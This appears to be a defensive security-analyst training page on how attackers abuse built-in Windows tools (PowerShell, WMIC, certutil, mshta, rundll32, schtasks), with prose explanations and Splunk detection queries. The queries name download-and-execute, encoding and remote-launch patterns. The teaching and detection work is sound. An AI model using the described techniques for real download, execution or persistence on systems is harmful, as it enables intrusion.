Detection
Signatures
APTs
PowerShell
PowerShell is a scripting engine used for administration and automation in Windows systems.
Attackers use PowerShell because it can run scripts directly in memory without creating files, automate many system actions, interact with the network, and bypass some execution policies. Common purposes include downloading payloads, gathering information, running code stealthily, or modifying system settings.
LOL viaPowerShell
In the above example, the first command uses the IEX (DownloadString) pattern to let an attacker fetch a script from a remote server and run it immediately in memory, avoiding disk artefacts and slowing detection. In the second command, -EncodedCommand hides the payload in base64, so human reviewers and simple log filters may miss the intent. Finally, it downloads and executes the file.exe.
An example detection is shown below:
index=wineventlog OR index=sysmon (EventCode=4688 OR EventCode=1 OR EventCode=4104)
(CommandLine="*powershell*IEX*" OR CommandLine="*powershell*-EncodedCommand*" OR CommandLine="*powershell*-Exec Bypass*" OR CommandLine="*Invoke-WebRequest*" OR CommandLine="*DownloadString*" OR CommandLine="*Invoke-RestMethod*")
| stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine
WMIC
WMIC (Windows Management Instrumentation Command-line) lets administrators query and manage local or remote Windows systems. It is commonly used by threat actors to execute commands remotely, through starting processes.
Attackers use WMIC to execute commands or create processes remotely, collect system information, or establish persistence without using external binaries. It blends with admin behaviour and is often allowed in restricted environments.
LOL via WMIC
In the first WMIC command, the operator targets a remote host and requests that the remote system create a new process. That new process is a PowerShell instance that downloads and executes a remote script, so WMIC acts as a remote launcher. Then, in the second WMIC command, the tool queries the remote system for its running processes and command lines, returning structured info useful for reconnaissance across hosts.
In the third WMIC command, the local WMIC process call create API is used to spawn notepad.exe On the same machine, the optional hiding flag demonstrates how an attacker might try to make a spawned process less visible.
An example detection alert can be found below:
index=sysmon OR index=wineventlog (EventCode=1 OR EventCode=4688)
(CommandLine="*\\wmic.exe*process call create*" OR CommandLine="*wmic /node:* process call create*" OR CommandLine="*wmic*process get Name,CommandLine*")
| stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine
Certutil
Certutil is a Microsoft tool used for managing certificates and encoding or decoding data. Certutil is intended for certificate management; it can download files with-urlcache, and it can decode base64 payloads, turning text blobs into binaries. Attackers use it because it is signed by Microsoft and common in admin workflows. It can place files without using curl or similar software, and it bypasses some simple blocking rules.
Threat actors use Certutil to download files, decode base64-encoded payloads, or disguise malicious code as legitimate certificate operations. Its network and file-handling capabilities make it a versatile tool for staging payloads or decoding encrypted scripts.
LOL via Certutil
In the first certutil command, the -urlcache -split -f flags instruct certutil to fetch the remote URL and write it to the specified local path; the result is a file dropped on disk that can be executed later.
In the second command, certutil reads a base64 text file encoded.b64, decodes it, and writes the resulting binary to decoded.exe, so an attacker can transport a binary as text, then reconstruct it on the host.
In the third command, certutil encodes an existing binary into base64 text stored in payload.b64. This can be used to obfuscate the payload during staging or transit.
Example alert:
index=sysmon OR index=wineventlog (EventCode=1 OR EventCode=4688 OR EventCode=4663)
(Image="*\\certutil.exe" OR CommandLine="*certutil*")
(CommandLine="* -urlcache * -f *" OR CommandLine="* -decode *" OR CommandLine="* -encode *")
| stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine
MSHTA
Mshta runs HTML Application (HTA) files, which can contain VBScript or JavaScript code.
LOL via Mshta
In the first mshta command, mshta loads the HTA from a remote server and executes the HTA content in the host context. In the second mshta command mshta is passed an inline javascript URI that creates a WScript.Shell ActiveX object and uses it to run PowerShell, which then starts a process, this shows how inline script can directly spawn system commands without a saved intermediary. In the third mshta command, mshta runs a local HTA file, useful when the attacker delivers the HTA as an attachment or drops it on a shared drive.
Example alert:
index=sysmon (EventCode=1 OR EventCode=4688) Image="*\\mshta.exe" (CommandLine="*http*://*" OR CommandLine="*javascript:*" OR CommandLine="*.hta")
| stats count by host, user, ParentImage, CommandLine
Rundll32
Rundll32 executes specific exported functions from DLL files.
LOL via Rundll32
In the first rundll32 command, rundll32 loads the specified DLL and calls its exported Start function, which runs the DLL's code. In the second rundll32 command, rundll32 invokes url.dll with FileProtocolHandler and a remote URL, causing the system handler to process the remote content, which can bootstrap further activity. The third rundll32 command is called a crafted export in a temporary DLL, which may execute embedded loader logic or shellcode from a file placed in a writable location.
Example alert:
index=sysmon (EventCode=1 OR EventCode=4688 OR EventCode=7) Image="*\\rundll32.exe" (CommandLine="*\\Users\\Public\\*" OR CommandLine="*url.dll,FileProtocolHandler*" OR CommandLine="*\\Windows\\Temp\\*")
| stats count by host, user, ParentImage, CommandLine
Scheduled tasks (schtasks / Task Scheduler)
Task Scheduler is a built-in Windows automation; it lets administrators run programs or scripts at specified times, on events such as logon, or on a repeating schedule. Tasks have a name, a trigger (when to run), an action (what to run), and an optional run-as account and conditions. Because it is a standard admin facility, tasks show up in normal system logs and are often allowed by policy, making it a valuable mechanism for both legitimate ops and attacker persistence. Attackers create or modify tasks to achieve persistence across reboots, to run code at user logon or on a regular cadence, or to quickly re-launch payloads after they remove other artefacts. They often pick task names that look benign, for example, WindowsUpdate or Maintenance, to avoid drawing attention. Tasks can run PowerShell, signed tools, or local scripts.
LOL via Task Scheduler
In the first schtasks command, a task named WindowsUpdate is created to run at logon. The action runs PowerShell, which downloads and executes a remote script on each user logon, providing persistence.
In the second schtasks command a daily task named DailyJob is scheduled to run a local script at 00:05 each day, this can automate repeated harmful actions like scheduled encryption or staged data collection.
In the third schtasks command, the attacker triggers the named task to run immediately, invoking its configured action on demand.
Example Alert:
index=wineventlog EventCode=4698 OR EventCode=4699 OR index=sysmon (EventCode=1 OR EventCode=4688) (CommandLine="*schtasks* /Create*" OR CommandLine="*schtasks* /Run*" OR Image="*\\taskeng.exe" OR EventCode=4698)
| stats count by host, user, EventCode, TaskName, CommandLine
The above are some examples of Windows software and utilities that can be used as shown, to download, execute files, and encode payloads. But attackers can use a whole variety of software and tools. As analysts, we need to be ready to analyse and update with the latest techniques to catch this activity.
Last updated